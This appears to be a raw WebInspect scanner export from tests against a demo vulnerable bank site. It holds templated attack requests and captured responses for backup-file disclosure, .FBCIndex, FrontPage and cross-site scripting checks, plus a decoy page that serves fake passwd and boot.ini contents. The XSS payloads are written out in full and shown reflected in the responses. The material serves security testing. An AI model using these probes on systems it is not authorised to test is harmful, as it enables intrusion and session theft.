Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:20 GMT
ETag: "5cb724c2a8dc11:8f6"
Content-Length: 1351
<%
dim sName, sPassPhrase
sName=Request("txtName")
sPassPhrase=Request("txtPassPhrase")
%>
<html>
<body>
<%
if lcase(sName)="root" then
Response.Write "Hello " & sName & "<br>Welcome back"
elseif lcase(sName)="/etc/passwd" then
Response.Write "root:x:0:0::/root:/bin/sh"
Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false"
Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false"
Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false"
Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false"
Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false"
Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false"
elseif lcase(sName)="/boot.ini" then
Response.Write "[boot loader]"
Response.Write "timeout=30"
Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT"
Response.Write "[operating systems]"
Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect"
Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect"
elseif lcase(sName)="*" then
Response.Write "An error has occured"
elseif lcase(sName)=";" then
Response.Write "NON-HTML ERROR"
else
Response.Write "Go away " & sName & "<br>I don't know you"
end if
%>
</body>
</html>
Backup File (Appended .old)A backup file with the appended extension .old was found on the server. Often, old files are renamed with such an extension to distinguish them from production files. However, the source code for old files that have been renamed in this manner and left in the webroot can often be retrieved.GET /rootlogin.asp<attack>.old</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
200 |Content-Type:\stext/plain |Content-Type:\sapplication/octet-stream GET /default.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/error.html
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:38 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 05:45:35 GMT
ETag: "481b288badc11:8f6"
Content-Length: 37
<%
response.redirect "login.asp"
%>Backup File (Appended .bak)A backup file with the extension .bak was found on the server. Often, old files are renamed with such an extension to distinguish them from production files. However, the source code for old files that have been renamed in this manner and left in the webroot can often be retrieved.GET /default.asp<attack>.bak</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/error.html
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
200 |Content-Type:\stext/plain |Content-Type:\sapplication/octet-stream GET /_private/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:50:23 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
OSX Content File (FBCIndex)By exploiting the case-insensitivity of HFS+, an attacker can evade Apache's access controls.
Using mod_hfs (which takes care of case-insensitivity in directory names) and using < FilesMatch> (with well-chosen regular expressions) instead of < Files> directives (to take care of case-insensitivity in filenames), we can "cure" the case-insensitivity problem and restore Apache's access controls. <br><br>
However, there is another problem lurking. A vulnerability has been found that allows remote attackers to list the content of the directory and view the index file created for those files by requesting an a special file that automatically created by Mac OS X.GET /_private/<attack>.FBCIndex</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
40[13] |200 |Bud2GET /login/login.asp?Action=Login&UserName=1"style="background:url(javascript:alert('XSS'))"%20"&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 374
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: 1"style="background:url(javascript:alert('XSS'))" "</h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?Action=Login&UserName=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&Password=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/><var name="path"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /_vti_bin/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:33 GMT
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 4431
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>You are not authorized to view this page</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Background:<br>
This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource.
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Directory (_vti_bin)FrontPage Directory: /_vti_bin/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password
protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /_vti_bin/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:33 GMT
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 4431
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>You are not authorized to view this page</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Background:<br>
This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource.
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HEAD / HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Content-Type: text/plain
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 17:03:39 GMT
X-Powered-By: ASP.NET
Location: banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Keep-Alive
Content-Length: 0
Content-Type: text/html
Cache-control: private
Set-Cookie: ASPSESSIONIDCQADCBSB=IPAAPGKBNLDFANIMOAOOHNCB; path=/
Method Alllowed CheckThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires that the server only allows the request methods specified. Webinspect has detected that the URL <B>~FullURL~ </B>has failed this policy.HEAD <var name="path"/> HTTP<var name="path"/>1.0
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla<var name="path"/>4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Content-Type: text<var name="path"/>plain
GET /login/login.asp?Action=Login&UserName=>"><script>alert('XSS')</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 355
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: >"><script>alert('XSS')</script></h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?Action=Login&UserName=<attack>>"><script>alert('XSS')</script></attack>&Password=333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/><var name="path"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=1"style="background:url(javascript:alert('XSS'))"%20"&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
